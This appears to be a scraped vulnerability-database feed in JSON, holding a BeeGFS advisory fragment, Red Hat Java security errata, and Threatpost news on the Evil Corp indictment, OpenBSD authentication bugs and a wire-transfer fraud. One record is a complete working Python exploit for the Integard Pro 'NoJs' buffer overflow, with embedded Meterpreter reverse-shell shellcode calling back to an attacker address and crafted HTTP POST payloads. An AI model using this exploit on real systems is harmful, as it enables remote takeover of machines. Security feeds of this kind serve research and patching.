The workaround described above is the official supported recommendation from BeeGFS.\r\n\r\nThe BeeGFS cloudformation templates have been updated in order to make use of a shared key.\r\n\r\n\r\nTimeline\r\n========\r\n\r\n2019-08-23: Issue reported to ThinkparQ\r\n2019-08-26: Acknowledgement from ThinkparQ\r\n2019-09-05: Details of proposed remediation from ThinkparQ and proposed disclosure date\r\n2019-11-17: HPCsec pre-advisory published\r\n2019-11-19: Confirmation that cloudformation templates have been updated\r\n2019-12-04: Advisory published\r\n\n\n# 0day.today [2019-12-06] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33631"}, {"lastseen": "2019-12-06T16:00:32", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category remote exploits", "modified": "2019-12-06T00:00:00", "published": "2019-12-06T00:00:00", "id": "1337DAY-ID-33629", "href": "https://0day.today/exploit/description/33629", "title": "Integard Pro NoJs 2.2.0.9026 - Remote Buffer Overflow Exploit", "type": "zdt", "sourceData": "Exploit Title: Integard Pro NoJs 2.2.0.9026 - Remote Buffer Overflow\r\nExploit Author: purpl3f0xsecur1ty\r\nVendor Homepage: https://www.tucows.com/\r\nSoftware Link: http://www.tucows.com/preview/519612/Integard-Home\r\nVersion: Pro 2.2.0.9026 / Home 2.0.0.9021\r\nTested on: Windows XP / Win7 / Win10\r\nCVE: CVE-2019-16702\r\n\r\n#!/usr/bin/python\r\n########################################################\r\n#~Integard Pro 2.2.0.9026 \"NoJs\" EIP overwrite exploit~#\r\n#~~~~~~~~~~~~~~~~Authored by purpl3f0x~~~~~~~~~~~~~~~~~#\r\n# The vulnerability: Integard fails to sanitize input #\r\n# to the \"NoJs\" parameter in an HTTP POST request, #\r\n# resulting in a stack buffer overflow that overwrites #\r\n# the instruction pointer, leading to remote code #\r\n# execution. 
#\r\n########################################################\r\n\r\nimport socket\r\nimport os\r\nimport sys\r\nfrom struct import pack\r\n\r\ndef main():\r\n print \"~*Integard RCE Exploit for XP/7/10*~\"\r\n print \"Chose target: (Enter number only)\"\r\n print \"1) - Windows XP\"\r\n print \"2) - Windows 7/10\"\r\n target = str(input())\r\n host = \"10.0.0.130\"\r\n port = 18881\r\n\r\n ####################################################\r\n # Integard's functionality interferes with reverse #\r\n # and bind shells. Only Meterpreter seems to work. #\r\n ####################################################\r\n\r\n # msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.128 LPORT=9001\r\n # -b \"\\x00\\x26\\x2f\\x3d\\x3f\\x5c\" -f python -v meterpreter EXITFUNC=thread\r\n meterpreter = \"\\x90\" * 50\r\n meterpreter += \"\\xda\\xcd\\xbe\\xa2\\x51\\xce\\x97\\xd9\\x74\\x24\\xf4\"\r\n meterpreter += \"\\x5f\\x2b\\xc9\\xb1\\x5b\\x83\\xef\\xfc\\x31\\x77\\x15\"\r\n meterpreter += \"\\x03\\x77\\x15\\x40\\xa4\\x32\\x7f\\x06\\x47\\xcb\\x80\"\r\n meterpreter += \"\\x66\\xc1\\x2e\\xb1\\xa6\\xb5\\x3b\\xe2\\x16\\xbd\\x6e\"\r\n meterpreter += \"\\x0f\\xdd\\x93\\x9a\\x84\\x93\\x3b\\xac\\x2d\\x19\\x1a\"\r\n meterpreter += \"\\x83\\xae\\x31\\x5e\\x82\\x2c\\x4b\\xb3\\x64\\x0c\\x84\"\r\n meterpreter += \"\\xc6\\x65\\x49\\xf8\\x2b\\x37\\x02\\x77\\x99\\xa8\\x27\"\r\n meterpreter += \"\\xcd\\x22\\x42\\x7b\\xc0\\x22\\xb7\\xcc\\xe3\\x03\\x66\"\r\n meterpreter += \"\\x46\\xba\\x83\\x88\\x8b\\xb7\\x8d\\x92\\xc8\\xfd\\x44\"\r\n meterpreter += \"\\x28\\x3a\\x8a\\x56\\xf8\\x72\\x73\\xf4\\xc5\\xba\\x86\"\r\n meterpreter += \"\\x04\\x01\\x7c\\x78\\x73\\x7b\\x7e\\x05\\x84\\xb8\\xfc\"\r\n meterpreter += \"\\xd1\\x01\\x5b\\xa6\\x92\\xb2\\x87\\x56\\x77\\x24\\x43\"\r\n meterpreter += \"\\x54\\x3c\\x22\\x0b\\x79\\xc3\\xe7\\x27\\x85\\x48\\x06\"\r\n meterpreter += \"\\xe8\\x0f\\x0a\\x2d\\x2c\\x4b\\xc9\\x4c\\x75\\x31\\xbc\"\r\n meterpreter += 
\"\\x71\\x65\\x9a\\x61\\xd4\\xed\\x37\\x76\\x65\\xac\\x5f\"\r\n meterpreter += \"\\xbb\\x44\\x4f\\xa0\\xd3\\xdf\\x3c\\x92\\x7c\\x74\\xab\"\r\n meterpreter += \"\\x9e\\xf5\\x52\\x2c\\x96\\x11\\x65\\xe2\\x10\\x71\\x9b\"\r\n meterpreter += \"\\x03\\x61\\x58\\x58\\x57\\x31\\xf2\\x49\\xd8\\xda\\x02\"\r\n meterpreter += \"\\x75\\x0d\\x76\\x08\\xe1\\xa4\\x87\\x0c\\x71\\xd0\\x85\"\r\n meterpreter += \"\\x0c\\x52\\x08\\x03\\xea\\xc4\\x1a\\x43\\xa2\\xa4\\xca\"\r\n meterpreter += \"\\x23\\x12\\x4d\\x01\\xac\\x4d\\x6d\\x2a\\x66\\xe6\\x04\"\r\n meterpreter += \"\\xc5\\xdf\\x5f\\xb1\\x7c\\x7a\\x2b\\x20\\x80\\x50\\x56\"\r\n meterpreter += \"\\x62\\x0a\\x51\\xa7\\x2d\\xfb\\x10\\xbb\\x5a\\x9c\\xda\"\r\n meterpreter += \"\\x43\\x9b\\x09\\xdb\\x29\\x9f\\x9b\\x8c\\xc5\\x9d\\xfa\"\r\n meterpreter += \"\\xfb\\x4a\\x5d\\x29\\x78\\x8c\\xa1\\xac\\x49\\xe7\\x94\"\r\n meterpreter += \"\\x3a\\xf6\\x9f\\xd8\\xaa\\xf6\\x5f\\x8f\\xa0\\xf6\\x37\"\r\n meterpreter += \"\\x77\\x91\\xa4\\x22\\x78\\x0c\\xd9\\xff\\xed\\xaf\\x88\"\r\n meterpreter += \"\\xac\\xa6\\xc7\\x36\\x8b\\x81\\x47\\xc8\\xfe\\x91\\x80\"\r\n meterpreter += \"\\x36\\x7d\\xbe\\x28\\x5f\\x7d\\xfe\\xc8\\x9f\\x17\\xfe\"\r\n meterpreter += \"\\x98\\xf7\\xec\\xd1\\x17\\x38\\x0d\\xf8\\x7f\\x50\\x84\"\r\n meterpreter += \"\\x6d\\xcd\\xc1\\x99\\xa7\\x93\\x5f\\x9a\\x44\\x08\\x6f\"\r\n meterpreter += \"\\xe1\\x25\\xaf\\x90\\x16\\x2c\\xd4\\x90\\x17\\x50\\xea\"\r\n meterpreter += \"\\xad\\xce\\x69\\x98\\xf0\\xd3\\xcd\\x83\\xee\\xf9\\x3b\"\r\n meterpreter += \"\\x2c\\xb7\\x68\\x86\\x31\\x48\\x47\\xc5\\x4f\\xcb\\x6d\"\r\n meterpreter += \"\\xb6\\xab\\xd3\\x04\\xb3\\xf0\\x53\\xf5\\xc9\\x69\\x36\"\r\n meterpreter += \"\\xf9\\x7e\\x89\\x13\"\r\n\r\n if target == \"1\":\r\n print \"[*] Sending Windows XP payload using meterpreter/reverse_tcp\"\r\n # JMP ESP at 0x3E087557 in iertutil.dll\r\n crash = \"A\" * 512\r\n crash += pack(\"<L\",0x3E087557)\r\n crash += meterpreter\r\n crash += \"C\" * (1500 - len(crash))\r\n\r\n buffer = \"\"\r\n buffer += 
\"POST /LoginAdmin HTTP/1.1\\r\\n\"\r\n buffer += \"Host: 10.0.0.130:18881\\r\\n\"\r\n buffer += \"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0\\r\\n\"\r\n buffer += \"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n\"\r\n buffer += \"Accept-Language: en-US,en;q=0.5\\r\\n\"\r\n buffer += \"Accept-Encoding: gzip, deflate\\r\\n\"\r\n buffer += \"Referer: http://10.0.0.130:18881/\\r\\n\"\r\n buffer += \"Connection: close\\r\\n\"\r\n buffer += \"Upgrade-Insecure-Requests: 1\\r\\n\"\r\n buffer += \"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\n buffer += \"Content-Length: 78\\r\\n\\r\\n\"\r\n buffer += \"Password=asdf&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=\" + crash + \"&LoginButtonName=Login\\r\\n\"\r\n\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.connect((host,port))\r\n s.send(buffer)\r\n s.close()\r\n print \"[*] Done\"\r\n\r\n if target == \"2\":\r\n print \"[*] Sending Windows 7/10 payload using meterpreter/reverse_tcp\"\r\n \r\n # ASLR IS ON!!! 
MUST USE NON-ASLR MODULE!\r\n # POP POP RET in integard.exe (ASLR disabled)\r\n nSEH = \"\\xEB\\xD0\\x90\\x90\" # Jump 48 bytes backwards\r\n SEH = pack(\"<L\",0x004042B0)\r\n\r\n jumpCall = \"\\xEB\\x09\" # Jump 11 bytes forward to hit the CALL in bigBackJump\r\n bigBackJump = \"\\x59\\xFE\\xCD\\xFE\\xCD\\xFE\\xCD\\xFF\\xE1\\xE8\\xF2\\xFF\\xFF\\xFF\"\r\n \r\n crash = \"\\x90\" * (2776 -len(jumpCall) - len(bigBackJump) - len(meterpreter) - 50)\r\n crash += meterpreter\r\n crash += \"\\x90\" * 50\r\n crash += jumpCall\r\n crash += bigBackJump\r\n crash += nSEH\r\n crash += SEH\r\n\r\n\r\n buffer = \"\"\r\n buffer += \"POST /LoginAdmin HTTP/1.1\\r\\n\"\r\n buffer += \"Host: 10.0.0.130:18881\\r\\n\"\r\n buffer += \"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0\\r\\n\"\r\n buffer += \"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n\"\r\n buffer += \"Accept-Language: en-US,en;q=0.5\\r\\n\"\r\n buffer += \"Accept-Encoding: gzip, deflate\\r\\n\"\r\n buffer += \"Referer: http://10.0.0.130:18881/\\r\\n\"\r\n buffer += \"Connection: close\\r\\n\"\r\n buffer += \"Upgrade-Insecure-Requests: 1\\r\\n\"\r\n buffer += \"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\n buffer += \"Content-Length: 78\\r\\n\\r\\n\"\r\n buffer += \"Password=asdf&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=\" + crash + \"&LoginButtonName=Login\\r\\n\"\r\n\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.connect((host,port))\r\n s.send(buffer)\r\n s.close()\r\n print \"[*] Done\"\r\n\r\nmain()\n\n# 0day.today [2019-12-06] #", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://0day.today/exploit/33629"}], "redhat": [{"lastseen": "2019-12-05T16:27:10", "bulletinFamily": "unix", "description": "IBM Java SE version 7 Release 1 includes the IBM Java Runtime Environment and the IBM Java Software Development Kit.\n\nThis update upgrades IBM Java SE 7 to version 7R1 SR4-FP55.\n\nSecurity 
Fix(es):\n\n* OpenJDK: Incorrect handling of nested jar: URLs in Jar URL handler (Networking, 8223892) (CVE-2019-2978)\n\n* OpenJDK: Incorrect handling of HTTP proxy responses in HttpURLConnection (Networking, 8225298) (CVE-2019-2989)\n\n* OpenJDK: Missing restrictions on use of custom SocketImpl (Networking, 8218573) (CVE-2019-2945)\n\n* OpenJDK: NULL pointer dereference in DrawGlyphList (2D, 8222690) (CVE-2019-2962)\n\n* OpenJDK: Unexpected exception thrown by Pattern processing crafted regular expression (Concurrency, 8222684) (CVE-2019-2964)\n\n* OpenJDK: Unexpected exception thrown by XPathParser processing crafted XPath expression (JAXP, 8223505) (CVE-2019-2973)\n\n* OpenJDK: Unexpected exception thrown by XPath processing crafted XPath expression (JAXP, 8224532) (CVE-2019-2981)\n\n* OpenJDK: Unexpected exception thrown during Font object deserialization (Serialization, 8224915) (CVE-2019-2983)\n\n* OpenJDK: Integer overflow in bounds check in SunGraphics2D (2D, 8225292) (CVE-2019-2988)\n\n* OpenJDK: Excessive memory allocation in CMap when reading TrueType font (2D, 8225597) (CVE-2019-2992)\n\n* OpenJDK: Insufficient filtering of HTML event attributes in Javadoc (Javadoc, 8226765) (CVE-2019-2999)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-12-05T20:16:08", "published": "2019-12-05T20:03:45", "id": "RHSA-2019:4110", "href": "https://access.redhat.com/errata/RHSA-2019:4110", "type": "redhat", "title": "(RHSA-2019:4110) Moderate: java-1.7.1-ibm security update", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-12-05T16:26:31", "bulletinFamily": "unix", "description": "IBM Java SE version 7 Release 1 includes the IBM Java Runtime Environment and the IBM Java Software Development Kit.\n\nThis update upgrades IBM Java SE 7 to version 7R1 SR4-FP55.\n\nSecurity 
Fix(es):\n\n* OpenJDK: Incorrect handling of nested jar: URLs in Jar URL handler (Networking, 8223892) (CVE-2019-2978)\n\n* OpenJDK: Incorrect handling of HTTP proxy responses in HttpURLConnection (Networking, 8225298) (CVE-2019-2989)\n\n* OpenJDK: Missing restrictions on use of custom SocketImpl (Networking, 8218573) (CVE-2019-2945)\n\n* OpenJDK: NULL pointer dereference in DrawGlyphList (2D, 8222690) (CVE-2019-2962)\n\n* OpenJDK: Unexpected exception thrown by Pattern processing crafted regular expression (Concurrency, 8222684) (CVE-2019-2964)\n\n* OpenJDK: Unexpected exception thrown by XPathParser processing crafted XPath expression (JAXP, 8223505) (CVE-2019-2973)\n\n* OpenJDK: Unexpected exception thrown by XPath processing crafted XPath expression (JAXP, 8224532) (CVE-2019-2981)\n\n* OpenJDK: Unexpected exception thrown during Font object deserialization (Serialization, 8224915) (CVE-2019-2983)\n\n* OpenJDK: Integer overflow in bounds check in SunGraphics2D (2D, 8225292) (CVE-2019-2988)\n\n* OpenJDK: Excessive memory allocation in CMap when reading TrueType font (2D, 8225597) (CVE-2019-2992)\n\n* OpenJDK: Insufficient filtering of HTML event attributes in Javadoc (Javadoc, 8226765) (CVE-2019-2999)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-12-05T20:15:12", "published": "2019-12-05T20:01:31", "id": "RHSA-2019:4109", "href": "https://access.redhat.com/errata/RHSA-2019:4109", "type": "redhat", "title": "(RHSA-2019:4109) Moderate: java-1.7.1-ibm security update", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "threatpost": [{"lastseen": "2019-12-06T13:46:13", "bulletinFamily": "info", "description": "U.S. authorities are offering up $5 million for information leading to the arrest of Evil Corp. leader Maksim V. 
Yakubets, 32, of Russia, who goes under the moniker \u201caqua.\u201d The U.S. alleges that Yakubets and his company have stolen millions of dollars from victims using the Dridex banking trojan and Zeus malware.\n\nSeparately, the U.S. Treasury Department [on Thursday](<https://home.treasury.gov/news/press-releases/sm845>) issued sanctions against Evil Corp, \u201cas part of a sweeping action against one of the world\u2019s most prolific cybercriminal organizations.\u201d\n\nThe $5 million is the largest such reward offer for a cybercriminal to date.\n\n\u201cMaksim Yakubets allegedly has engaged in a decade-long cybercrime spree that deployed two of the most damaging pieces of financial malware ever used and resulted in tens of millions of dollars of losses to victims worldwide,\u201d said Assistant Attorney General Benczkowski [in a statement, Thursday](<https://www.justice.gov/opa/pr/russian-national-charged-decade-long-series-hacking-and-bank-fraud-offenses-resulting-tens?hootPostID=629d449ac4fd1b12d37f66d6551dbec1>). \u201cThese two cases demonstrate our commitment to unmasking the perpetrators behind the world\u2019s most egregious cyberattacks. The assistance of our international partners, in particular the National Crime Agency of the United Kingdom, was crucial to our efforts to identify Yakubets and his co-conspirators.\u201d\n\nThe indictment, which also charges a second Evil Corp. member, Igor Turashev, 38, alleges Yakubets was the leader of the cybercrime gang and oversaw the development and distribution of the Dridex malware and botnet.\n\nSince its first appearance in 2012, [banking trojan Dridex](<https://threatpost.com/new-dridex-phishing-campaign-delivers-fake-accounting-invoices/127867/>) (also known as Bugat and Cridex) has been deployed via phishing emails and targets banking information. 
By 2015, the malware was one of the most [prevalent financial trojans](<https://threatpost.com/new-dridex-variant-slips-by-anti-virus-detection/146134/>) in the wild; while later versions of the malware were designed with the added function of assisting in the installation of ransomware.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/12/05122000/photo12052019.jpg>)\n\nThe scheme involved capturing banking credentials, and causing banks to make unauthorized electronic funds transfers from unknowing victims\u2019 bank accounts. Money mules would then receive these stolen funds into their bank accounts, and transport the funds overseas. Multiple companies were targeted by Dridex, costing them millions of dollars; victims included two banks, a school district, a petroleum business, building materials supply company and others.\n\nThe indictment also alleges that Yakubets has also been involved with the [Zeus malware](<https://threatpost.com/zeus-banking-trojan-resurfaces-as-atmos-variant/117344/>) since 2009, which authorities claim he used to infect thousands of business computers with malicious software that captured passwords, account numbers and other information, before using that data to log into online banking accounts to steal money from victims.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/12/05121936/cybergroup.png>)\n\nPictures from the NCA showcase the lavish lifestyle of Evil Corp. leader Yakubets\n\nAt least 21 municipalities, banks, companies, and non-profit organizations were targeted by Zeus, with the overall attempted theft resulting in around $220 million in losses (actual losses before reimbursement from victim bank accounts totaled $70 million).\n\nThe National Crime Agency, which worked with U.S. 
authorities to identify the cybercrime ring, in a [separate report on Thursday](<https://www.nationalcrimeagency.gov.uk/news/international-law-enforcement-operation-exposes-the-world-s-most-harmful-cyber-crime-group>) shed some light on the members of Evil Corp. and the lavish lifestyle of Yakubets, who drives a customized Lamborghini \u201csupercar\u201d with a personalized number plate that translates to \u201cThief.\u201d He also spent more than a quarter of a million pounds ($330,000) on his wedding.\n\n\u201cWhile the harm caused by this group has targeted mainly financial institutions, there is no doubt that their activity has had real-world impacts, defrauding and stealing from victims in the U.K. and worldwide,\u201d Lynne Owens, director general of the NCA, said in a statement. \u201cThe Lamborghini Yakubets drives was someone\u2019s life savings, now emptied from their bank account.\u201d\n\nSeparately, the Department of Homeland Security (DHS) [on Thursday](<https://www.us-cert.gov/ncas/alerts/aa19-339a>) alerted companies about ongoing Dridex attacks targeting banking and financial companies via email spam messages. The alert warns companies to contact law enforcement immediately to report regarding any identified activity related to Dridex malware or its derivatives.\n\n[**Free Threatpost Webinar:**](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>) **_Risk around third-party vendors is real and can lead to data disasters. We rely on third-party vendors, but that doesn\u2019t mean forfeiting security. _**[**_Join us on Dec. 18th at 2 pm EST_**](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>)**_ as Threatpost looks at managing third-party relationship risks with industry experts Dr. Larry Ponemon, of Ponemon Institute; Harlan Carvey, with Digital Guardian and Flashpoint\u2019s Lance James. 
_**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>)**_._**\n\n * [Government](<https://threatpost.com/category/government/>)\n * [Hacks](<https://threatpost.com/category/hacks/>)\n * [Malware](<https://threatpost.com/category/malware-2/>)\n", "modified": "2019-12-05T17:55:43", "published": "2019-12-05T17:55:43", "id": "THREATPOST:082A6E9ABEDD3AF8D159ABE7C857B84A", "href": "https://threatpost.com/feds-5m-reward-evil-corp-dridex-hacker/150858/", "type": "threatpost", "title": "Feds Offer $5M Reward to Nab 'Evil Corp' Dridex Hacker", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-05T16:11:58", "bulletinFamily": "info", "description": "An authentication bypass and three local privilege-escalation (LPE) bugs have been uncovered in OpenBSD, the Unix-like open-source operating system known for its security protections.\n\nThe most severe of the vulnerabilities is the bypass (CVE-2019-19521), which is remotely exploitable.\n\nOpenBSD uses BSD authentication, which enables the use of passwords, S/Key challenge-and-response authentication and Yubico YubiKey tokens. In each of these cases, to perform the authentication, the string \u201c/usr/libexec/auth/login_style [-v name=value] [-s service] username class\u201d is used. If an attacker specifies the username \u201c-schallenge\u201d (or \u201c-schallenge:passwd\u201d), the authentication is automatically successful and therefore bypassed.\n\nThat said, \u201cIts real-world impact should be studied on a case-by-case basis,\u201d said Qualys, the research firm that found the bugs, in [an advisory](<https://www.qualys.com/2019/12/04/cve-2019-19521/authentication-vulnerabilities-openbsd.txt?_ga=2.75852181.122675264.1575541632-949691503.1575541632>) issued this week. 
\u201cFor example, sshd is not exploitable thanks to its defense-in-depth mechanisms.\u201d\n\nThe other bugs include CVE-2019-19520, which allows LPE via xlock, which refuses all new server connections until a user enters a password at the keyboard; CVE-2019-19522, which allows LPE via the aforementioned authentication mechanisms S/Key and YubiKey; and CVE-2019-19519, which allows LPE via su.\n\nThe first bug exists because, \u201c/usr/X11R6/bin/xlock is installed by default and is set-group-ID \u2018auth,\u2019 not set-user-ID, which leaves an incomplete check,\u201d Qualys explained. \u201cA local attacker can exploit this vulnerability and dlopen() their own driver to obtain the privileges of the group \u2018auth.'\u201d\n\nArmed with the privileges of the group \u201cauth\u201d, a local attacker can then use the second LPE bug to obtain full root privileges, if the S/Key or YubiKey authentication type is enabled.\n\n\u201c[That\u2019s because login_skey and login_yubikey do not verify that the files in /etc/skey and /var/db/yubikey belong to the correct user, and these directories are both writable by the group \u2018auth,'\u201d Qualys said.\n\nTo exploit the issue, a local attacker with \u201cauth\u201d privileges can add an S/Key entry (a file in /etc/skey) or a YubiKey entry (two files in /var/db/yubikey) for the user \u201croot.\u201d\n\nThe last bug allows a local attacker to exploit a problem in su. \u201cSu\u201d stands for \u201csubstitute user,\u201d and is used by a computer user to execute commands with the privileges of another user account. 
When executed it invokes a shell without changing the current working directory or the user environment.\n\nIn this case, a flaw in su\u2019s -L option (\u201cLoop until a correct username and password combination is entered\u201d) allows an attacker to log in as themselves but with another user\u2019s login class.\n\n[OpenBSD](<https://threatpost.com/experts-openbsd-backdoor-allegations-almost-certainly-false-121510/74782/>) patches are available, and users should [apply them](<https://www.openbsd.org/faq/faq10.html>) to protect against attacks.\n\n[**Free Threatpost Webinar:**](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>) **_Risk around third-party vendors is real and can lead to data disasters. We rely on third-party vendors, but that doesn\u2019t mean forfeiting security. _**[**_Join us on Dec. 18th at 2 pm EST_**](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>)**_ as Threatpost looks at managing third-party relationship risks with industry experts Dr. Larry Ponemon, of Ponemon Institute; Harlan Carvey, with Digital Guardian and Flashpoint\u2019s Lance James. 
_**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>)**_._**\n", "modified": "2019-12-05T16:06:51", "published": "2019-12-05T16:06:51", "id": "THREATPOST:4524DC4DCBB97B9FDC5E13DA68B9DD1A", "href": "https://threatpost.com/openbsd-authentication-lpe-bugs/150849/", "type": "threatpost", "title": "OpenBSD Hit with Authentication, LPE Bugs", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-05T15:56:06", "bulletinFamily": "info", "description": "Hackers pulled off an elaborate man-in-the-middle campaign to rip off an Israeli startup by intercepting a wire transfer from a Chinese venture-capital firm intended for the new business.\n\nNew research by [Check Point Software](<https://www.checkpoint.com/>) details how the security vendor uncovered the wire-transfer heist, in which an attacker used unique tactics\u2014including communicating through email and even canceling a critical in-person meeting\u2013to fool both parties on either end of the transfer, researchers said.\n\nCheck Point became involved in the incident when a $1 million wire-transfer made between the two parties never reached the startup, researchers said [in a report posted online Thursday](<https://research.checkpoint.com/2019/incident-response-casefile-a-successful-bec-leveraging-lookalike-domains/>).\n\nTypically in this [type of cybercrime](<https://threatpost.com/bank-settles-customer-wire-transfer-theft-052510/74015/>), a criminal will keep track of emails between the two parties arranging a wire transfer by creating an auto-forwarding rule to intercept them. In this case, the attacker went above and beyond this, registering two new lookalike domains to get more closely involved in the action, researchers said.\n\nCheck Point researchers collected and analyzed the available logs, e-mails and PCs involved in the transfer, they said. 
What they discovered was that it was obvious upon examining the emails involved in the transfer that something was amiss, observing the activity between the lookalike domains and the two companies.\n\n\u201cThe first domain was essentially the same as the Israeli startup domain, but with an additional \u2018s\u2019 added to the end of the domain name,\u201d researchers wrote. \u201cThe second domain closely resembled that of the Chinese VC company, but once again added an \u2018s\u2019 to the end of the domain name.\u201d\n\nTo appear as if communication with the companies was legitimate, the attacker then sent two emails with the same headline as the original thread. The first was to the VC from the Israeli lookalike domain spoofing the email address of the Israeli startup\u2019s CEO, and the second to the Israeli startup from the lookalike Chinese VC company domain spoofing the VC account manager that handled the investment, researchers said.\n\n\u201cThis infrastructure gave the attacker the ability to conduct the ultimate man-in-the-middle attack,\u201d researchers wrote. \u201cEvery email sent by each side was in reality sent to the attacker, who then reviewed the email, decided if any content needed to be edited, and then forwarded the email from the relevant lookalike domain to its original destination.\u201d\n\nIndeed, the attackers sent 18 emails to the VC firm and 14 to the startup in the course of the campaign to disrupt the transaction and modify bank details so the wire eventually was sent to an account that attackers could access. Check Point traced the stolen money to a bank account belonging to a closed business in Hong Kong, researchers said.\n\nAttackers even managed to use this communication to cancel a meeting that was scheduled in Shanghai between the Chinese owner of the account where the transfer was headed and the CEO of the Israeli startup, researchers said. 
The hackers sent separate emails to each party that used different excuses for the cancellation, according to Check Point.\n\n\u201cWithout this crucial act from the attacker\u2019s side, the whole operation would probably have failed,\u201d researchers said. \u201cIt\u2019s reasonable to expect that during the meeting, the account owner would be asked to verify the bank account changes that were made.\u201d\n\nThis act in and of itself showed that the attackers had experience, but what they did after they successfully pulled off their heist showed another level of arrogance, researchers said.\n\n\u201cInstead of cutting all lines of communication after such a heist, the threat actor(s) did not cease their efforts but tried to go after another round of the VC investment,\u201d they wrote in their report.\n\nEven after the parties affected by the attack remediated it, the CFO of the Israeli startup continues to receive one email every month from the spoofed CEO account that asks him to perform a wire transaction, researchers added.\n\nThe attack is a cautionary tale to anyone using wire transfers to send significant sums of money to put safeguards in place before the transaction goes through to ensure it can\u2019t be intercepted by a third party, and then to have incident response in place after to handle any crisis scenario immediately, researchers said.\n\nCheck Point offered a number of recommendations to avoid scenarios like the one they uncovered, including: adding a second verification to ensure the transaction made it to the intended party directly after sending it; keeping audit and access logs; maintaining all evidence of the transaction in case an investigation is needed; and using tools to identify any look-alike domains that may have been registered and appear suspect.\n\n[**Threatpost Webinar:**](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>) **_Risk around third-party vendors is real and can lead to data disasters. 
We rely on third-party vendors, but that doesn\u2019t mean forfeiting security. _**[**_Join us on Dec. 18th at 2 pm EST_**](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>)**_ as Threatpost looks at managing third-party relationship risks with industry experts Dr. Larry Ponemon, of Ponemon Institute; Harlan Carvey, with Digital Guardian and Flashpoint\u2019s Lance James. _**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>)**_._**\n", "modified": "2019-12-05T11:44:03", "published": "2019-12-05T11:44:03", "id": "THREATPOST:21AE7D819949E3EC3B23792C6E699BED", "href": "https://threatpost.com/ultimate-mitm-attack-steals-1m-from-israeli-startup/150840/", "type": "threatpost", "title": "'Ultimate' MiTM Attack Steals $1M from Israeli Startup", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-05T21:13:06", "bulletinFamily": "info", "description": "While APT activity is generally considered to be aimed at large enterprises housing valuable intellectual property, military-industrial entities, dissidents and civil society, and organizations of strategic importance to governments, the vast majority of small- and medium-sized businesses (SMBs) are concerned that they may be on the target list.\n\nA full 93 percent of all SMB executives in a recent survey from AppRiver believe that nation-state-backed attackers are attempting to use businesses like theirs to breach the country\u2019s digital security. And, this already-high figure jumps to 97 percent among larger SMBs with 150\u2013250 employees. 
The reasoning goes that APTs see SMBs as entry points into a supply chain through which they can access larger game.\n\nOverall, two-thirds (66 percent) of SMB execs (and three quarters or 76 percent of execs at larger SMBs) also believe that foreign attempts to breach national security or wage cyberwar will be more severe next year in the run-up to the presidential election.\n\nSMBs operating in specific verticals \u2013 government, healthcare and pharmaceutical, technology and telecom, and transportation and logistics \u2013 are the most concerned about these kinds of attacks, the data shows.\n\n\u201cIt is possible that as a small business grows, it could become a more likely target for bad actors,\u201d according to the report. \u201cIt is also possible that small businesses with cloud-based services with built-in security and fewer employees have fewer vulnerable attack entry points. However, as this year\u2019s growing attacks on [local municipalities](<https://threatpost.com/the-texas-ransomware-attacks-a-gamechanger-for-cybercriminals/147597/>), schools and [small hospitals](<https://threatpost.com/ransomware-attacks-leave-u-s-hospitals-turning-away-patients/148823/>) have shown, smaller organizations can no longer count on flying below the radar and being ignored by cybercriminals.\u201d\n\nThese fears go hand-in-hand with planned investment. [The survey](<https://www.appriver.com/files/documents/cyberthreatindex/appriverq4_2019_index_summary_final_11222019.pdf>), released on Tuesday, found that 62 percent plan to increase their cybersecurity budgets in 2020 to shore up their defenses against these types of attacks. 
